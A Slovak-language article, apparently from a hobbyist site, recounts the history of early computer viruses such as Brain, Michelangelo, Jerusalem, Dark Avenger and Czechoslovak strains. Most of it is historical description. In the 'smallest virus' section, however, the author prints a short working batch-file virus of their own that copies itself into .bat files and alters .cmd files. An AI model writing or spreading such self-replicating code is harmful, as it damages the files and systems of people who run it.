Prvé viry 

Prvým počítačovým virom bol Elk Cloner a nie BRAIN, ako to väčsina tvrdila. Virus BRAIN bol napísaný až o niekoľko rokov.

Vir Elk Cloner vytvoril Richard Skrenta okolo roku 1982 v Mont Lebanone (USA). Bol to boot virus určený pre platformu 
Apple II. Pri spustení vypísal hlášku:

                                  ELK CLONER: 

                                  THE PROGRAM WITH A PERSONALITY 

                                  IT WILL GET ON ALL YOUR DISKS 
                                  IT WILL INFILTRATE YOUR CHIPS
                                  YES IT´S CLONER!

                                  IT WILL STICK TO YOU LIKE GLUE
                                  IT WIIL MODIFY RAM TOO 
                                  SEND IN THE CLONER!



Časť zdrojáku z ELK: kód 



Ďaľším virom z pomedzi tých prvých bol virus Brain . Vytvorili ho dvaja bratia Basit Farooq Alvi a Amjad Farooq Alvi 

z Pakistanu v januáry roku 1986. Bol to pamäťovo rezidentný stealth boot infector - infikoval boot sektory FAT tabuliek 
diskov (diskety) hooknutím INT13, pričom pozmenil volume label na "(c) brain" alebo "(c) ashar" a na disketách
označil 3 KB clusterov ako chybných. 

Vírus obsahoval správu:

                                  Welcome to the Dungeonv 
                                  (c) 1986 Basit & Amajd (ptv) Ltd.
                                  BRAIN COMPUTER SERVICES
                                  7360 Nizam Block Allama
                                  Iqbal Town
                                  Lahore, Pakistan
                                  Phone: 430791, 443248, 280530
                                  Beware of this VIRUS
                                  Contact us for vaccination 

Modifikovaný sektor obsahoval text:

                                  Welcome to Dungeon
                                  (c) 1986 Brain & Amjads (pvt) Ltd
                                  VIRUS_SHOE RECORD v9.0
                                  Dedicated to dynamic memories
                                  of millions of virus who are no longer with us
                                  today - Thanks GOODNESS!!
                                  BEWARE OF THE er..VIRUS: this program is catching 
                                  program follows after these messages..... $#@%$@!!



Autori Braina uverejnili v správe svoje kontaktné údaje pomocou ktorých ich rýchlo odhalily. 
Iróniou bolo to, že sa k viru prví dostali ľudia, ktorí nakupovali u týchto bratov nelegálny software.

Ďaľšie aliasy viru : Ashar, (C) Brain, Clone, Nipper, Pakistani virus, Pakistani Brain, Pakistani Flu, Lahore virus, UIUC.

 

 

Najväčšie škody

Najväčšie škody spôsobil asi jeden z prvých a zároveň najznámejších červov, ktorý vytvoril druhého novembra v roku 

1988 vtedy 23 ročný študent Robert Tappan Morris. Morris zneužil otcové poznatky o slabých miestach v zabezpečení 
unixových sietí a ukázal, ako ľahko sa dajú zneužiť. Worm napadol vyše 6000 počítačov bežiacich pod unixom, pričom
zablokoval sieť na vyše ako 36 hodín. Celková škoda dosiahla hranicu približne $ 100 000 000. 
Morris bol v roku 1990 uznaný vinným a odsúdený na tri roky nepodmienečne + musel uhradiť peňažnú pokutu vo 
výške $ 10 000.

 

 

Najznámejší vírus


Prílišnú popularitu svojho času mal vir Michelangelo. Písalo sa o ňom všade u nás aj v zahraničí. Články vychádzali v 

dennej tlači, odborných časopisoch, hovorilo sa o ňom v televízií a rozhlase. Práve takáto možno až chorá popularita 
naštartovala iných tvorcov virov, ktorí zatúžili byť takýmto spôsobom populárni.

Michelangelo bol vir, ktorý sa pri spustení nakopíroval do MBR disku. Pôvodný partičný sektor MBR presunul na
cilinder 0 - hlava 0 - sektor 7 . Po vložení 360 KB diskiet Michelangelo prepísal prvý boot sektor, pričom pôvodný boot 
sektor presunul na cilinder 0 - hlava 1 - sektor 3 , u väčších diskiet na cilinder 0 - hlava 1 - sektor 14. 6. marca prepísal 
prvé sektory diskov nulami.
Objavený bol v apríli roku 1991, pochádza z Holandska.


Zdrojové kódy Michelangela: kód

 


Najmenší vírus

Najmenším virom je podľa všetkého TrivialOW.13, patriaci do skupiny Trivial. Má len 13 Bytov. Pri spustení vir infikuje

prvý súbor, ktorý sa nacháda v aktuálnom adresári ako vir. Tak ako celá skupina Trivial, infikuje executable súbory s
koncovkami .exe a .com .

V minulosti prakticky väčsina virov boli file infecktory. Viac-menej nie je také ťažké napísať nejakého. Ja som si zvolil 
prostredie DOSU:

                                  @prompt $ 
                                  for %%f in (*.cmd) do ( 
                                  for %%a in (%time%) do ( 
                                  echo.D%%aI%%aA%%aL%%aL%%aI%%aX is here!>sft) 
                                  type sft>>%%f 
                                  del sft) 
                                  for %%h in (*.bat) do ( 
                                  find "D~I?" < %%~h >nul
                                  if errorlevel 1 type %0>%%~h)



Ako je zrejmé ide o file infectora .bat a .cmd suborov, ktorý ich infikuje v aktuálnom priečinku ako je vir. Má 217 bytov
a jeho vyvorenie trvalo tri minúty :).

 

 

Naše viry

Dávnejšie som sa dostal k niekoľkým virom, ktoré pochádzajú od nás, respektíve z Československa. Bolo by chybou ich 

tu neuverejniť.

 

Semtex -- Bol vytvorený v septembri roku 1991. Ide o rezidentný file infector súborov .com vrátane systémového

súboru command.com. Zujímavosť tochto viru spočíva v tom, že pri infikovaní určitého počtu súborov 
alebo po uplinutí určitého času, náhodne zobrazil na obrazovke farebné znaky.

Vírus obsahoval v jednotlivých variantách následovné texty:

                                  Semtex.512. Semtex.619, Semtex.1000a: SEMTEX by Dusan Toman, CZECHOSLOVAKIA
                                  (7)213-040 or (894)212-23

                                  Semtex.686: !!! explosive !!! SEMTEX !!! explosive !!! Written by Dusan Toman, CZECHOSLOVAKIA
                                  Pyrotechnician Lilo Hedera (7)213-040 or (894)212-23

                                  Semtex.1000b: SEMTEX by Dusan Toman, CZECHOSLOVAKIA *** Have a nice day ***



Backtime -- Bol vytvorený v auguste 1991 v Prahe. Jeho známe aliasy sú: Shaker, Joker, Blinker. Je to file infector

napadajúci .com súbory, pričom do nich vloží hodnotu "Shaker" alebo "Backtime". Vir začne infekciu len 
v tom prípade,že nie je poškodený systémový súbor command.com. 

Shaker -- táto varianta spôsobovala "shaking" efekt - roztrasenie obrazovky.

Blinker -- táto varianta rozblikala po určitom čase monitor. 

Joker -- joker sa spúšťal viacej ako 18x za sekundu, čo viedlo k preťaženiu zásobíka dočasnej pamäti,
v niektorých prípadoch k jej poškodeniu. Preťaženie zásobníka spôsobovalo nesprávny beh 
programov.
 

 

Slovakia -- Polymorfný file infector pochadzajúci zo Slovenska. Hookuje INT 21h, pričom napáda .exe

(niektoré varianty aj .com) súbory.Celkovo boli vypustené 4 varianty tochto viru. 

Vírus od 1.1 do 8.1 vypísal hlášky:

                                  Greeting from Bratislava, Slovakia.
                                  Type the word SLOVAKIA:
                                  Slovakia virus version 2.00 (c) 1991 by SVL. All Rights Reserved.
                                  Type word SLOVAKIA, not CZECH, YUGOSLAVIA or SLOVENIA !!
                                  Press ESC.
                                  Msg #0 to Slon! & Kuko. Hi, pleased to meet your program. Enjoy new version of S. Bye

                                  HAPPY NEW YEAR, SLOVAKIA!



Ako je zrejmé, autorovi viru nešlo o to škodiť užívateľom, ale dostať sa do povedomia na virovej scéne.



Milena -- Vírus bol vytvorený 5 januára v roku 1991. Podľa dokumentácie McAfee ide o file infector, ktorý neškodil iba

propagoval samého seba (podobne ako Slovakia). Do vnúra infikovaných súborov vkladal názvy:

                                   "LOVE"
                                  "I Love Milena"

Názov "MILENA" si autor pravdepodobne zvolil podľa obľúbenej tyčinky Milena.
 
 

Ďaľšie viry

Prehľad ďaľších zaujímavých kúskov.

Dark Avenger -- je to polymorfný file infector napadajúci .exe a .com súbory. Do súborov vkladá 1800 Bytov. Vírus
infikuje súbory pri kopírovaní, pri čítaní, prí zápise, pri spustení a pri zmene attributov. Niektoré 
varianty obnovovali vírus Anthrax (ak bol prv vyliečený) z posledných sektorov na disku. Navyše 
mazal náhodne zvolený sektor na disku, čo viedlo k odmazaniu a stráte dát, ak na ňom boli. 
Oficiálne bolo niekoľko verzií tochto viru.

Jednotlivé verzie obsahovali v zdrojáku niektorý z nižšie uvedených textov:

                                  Diana P.

                                  Eddie lives... somewhere in time!

                                  Copy me - I want to travel

                                  Eddie Lives

                                  Only the Good die young

                                  This program was written in the city of Sofia (C) 1988-89 Dark Avenger

                                  Copyright (C) 1989 by Vesselin Bontchev



Ďaľšie aliasy viru : Eddie, Black Avenger, Diana, Travell virus, Apocalypse, Die Young.
Bol vytvorený v roku 1989 a pochádza z Bulharska. 
Asi málokto vie,že autor dal viru názov Eddie podľa maskota skupiny Iron Maiden.

Tvorca viru Dark Avenger uverejnil niekedy začiatkom roku 1991 na sieti FidoNet správu, v ktorej 
oznámil, že vytvorí ďaľšie viry. Na veľký nesúhlas užívateľov odpovedal hanlivými správami. Presne 
o rok vypustil dva viry Dedicated a Pogue. Pogue obsahoval časti virov Dark Avenger a Yankee 
Doodle.x 



Vienna -- File infector napadajúci .com súbory. Infikované súbory majú v časovom označení hodnotu "62". Celkovo
jeden z piatich súborov sa pri infikovaní zničil, nakoľko vírus prepísal na začiatku programu 5 Bytov
hodnotou hex, čím program pri spustení začal bootovať.
Vírus Vienna, mal nespočetne veľa variant, ktoré nepochádzali od pôvodného autora. Za následok to malo 
uverejnenie zdrojových kódov virov, vrátane Vienny Ralphom Burgerom v jeho knihe. Keď bola vyhlásená 
súťaž o najmenší vírus, vírus Vienna bol jedným na ktorý sa programátori zamerali.
Niektoré varianty formátovali disk, ničili sektory alebo schválne ničili súbory. Keďže išlo o masové
upravovanie a dodatočné vytváranie zdrojákov Vienny, nebolo možné presne určiť ako si ho autori doladili.


Pôvodný vírus Vienna bol vytvorený niekedy v Apríli roku 1988 v Rakúsku.



Chameleon -- Je vôbec ako prvý polymorfný vírus. Infikoval .exe a .com súbory. Do infikovaných súborov vkladal kód

o velikosti 1260 bytov. Bolo vypustených viacero variant tochto viru, ale pôvodný vírus bol napísaný
v máji 1991 a pochádza z Viedne.




Jerusalem -- Polymorfný file infector napadajúci .exe a .com súbory, okrem súboru command.com. Vírus hookuje
INT 8h, INT 9, INT 16h a INT 21h. Pri hooknutí INT 21h často dochádzalo ku kolízií pri práci v sieti, čo 
spôsobovali funkcie : 0D8h, 0CFh, 0E0h, 0B8H, 9Dh, 0FCh, 0DEh, 3Dh, ... . Vírus približne 30 minút po
spustení začne nadmerne preťažovať RAM, čo za nejaký čas spôsobí totálne spomalenie systému.
V piatok 13 vírus zmaže každý program, ktorý bol v tento deň spustený.
Je viacero variant viru Jerusalem, ktoré majú zadefinovaný iný čas mazania súborov ako v piatok 13., 
napr. Streda 13., Sobota 13., Utorok 1., Utorok 13, 25. januára a podobne.
Jedna varianta viru Jerusalem - Czech pochádza z Českej republiky.

Jednotlivé verzie viru vypisovali alebo obsahovali niektoré z nižšie uvedených textov:

                                  MIKY 786290 B livia

                                  CopyRight (C) 1988 - 1989 by ABT Group

                                  Virus RAQUEL v.9 (C) IMV Galicia ´94

                                  Captain Trips

                                  SpitFire

                                  CARFIELD!

                                  Apocalypse!!



Jerusalem bol vytvorený koncom roku 1987 na Hebrewovej univerzite v Izraeli. 

Zdrojové kódy Jerusalemu: kód1 kód2


Slayer -- Vírus Slayer alebo "zabijak" patrí do širokej rodiny Slayer´s Family. Ide o súborový vírus napadajúci .com a 
.exe súbory. Vírus infikuje súbory, ktoré sú v rovnakom adresári ako vir. Varianta Slayer-A napáda súbory 
na celom disku. Krátko po spustení vir začne náhodne zapisovať a mazať údaje na disk, čím ho zaťaží a 
systém mrzne. Objavili sa aj varianty "zabijaka", ktoré prepisovali MBR sektor.

Slayo v kóde obsahoval reťazec:


KEYB٭.COM  KEYB٭.EXE  BASRUN  BRUN  COBRUN  NETsOS  ٭.COM  IBMBIO.COM  IBMDOS.COM
COMMAND.COM  ٭.٭  ..\.. *.EXE   ACCESS DENIED.  ٭.EXE


Varianta Slayer-E niesla v sebe vírus Yankee Doodle, ktorý vrátane seba aktivoval. Yankee Doodle patrí
taktiež medzi file infectory. Každý deň o 17:00 zahral melódiu Yankee Doodle. Posledné vypustené verzie 
Yankee Doodle ničili viry Italian, Cascade a Ping-Pong.

Vírus Slayer bol vytvorený asi 1. mája v roku 1991. Pochádza z U.S.A..




Niektoré z virov okrem infikovania súborov, či prepísania MBR zobrazovali po nákaze (niektoré aj pre ´Good Bye´) na 

obrazovke grafické objekty s cielom "pobaviť" obeť. Objekty mali tvar od postavičiek až po nezmyselné, náhodné 
zobrazené pixely. 

Najznámejšie z nich:

 

Cascade - Vírus zobrazoval padajúce písmená doprevadzajúcim zvukovým efektom.

Frodo - Vírus na monitore zobrazil čierny rámik s textom "FRODO LIVES". Pôvodne obsahuje viacero efektov, no 
nie všetky správne fungovali.

Italian - Vírus zobrazoval niekoľko pixelovú bodku pohybujúcu sa po monitore.

Kuku - Po spustení virus "rozbil" a rozložil pôvodný obraz monitora na chaoticko usporiadané obdĺžniky a štvorce 
rôzných farieb, pričom preblikovali nápisy "Kuk KUKU!"

Marburg - Vírus monitor zahltil červenými kruhmi s bielým X uprostred.

Marine - Po spustení sa pôvodná obrazovka stratila a v grafickom režime sa objavilo more s malou loďkou.

Ping-Pong - Po spustení viru sa na obrazovke objavila malá, skákajúca lopta zo strany na stranu.

Possessed - Vírus zobrazil na obrazovke vyškerenú tvár diabla.

Teguila - Vírus zobrazoval obrázok pomocou rekurzie z náhodne poskladaných pixelov.

Walker - Vírus zobrazil na monitore pohybujúcu sa postavičku s mečom.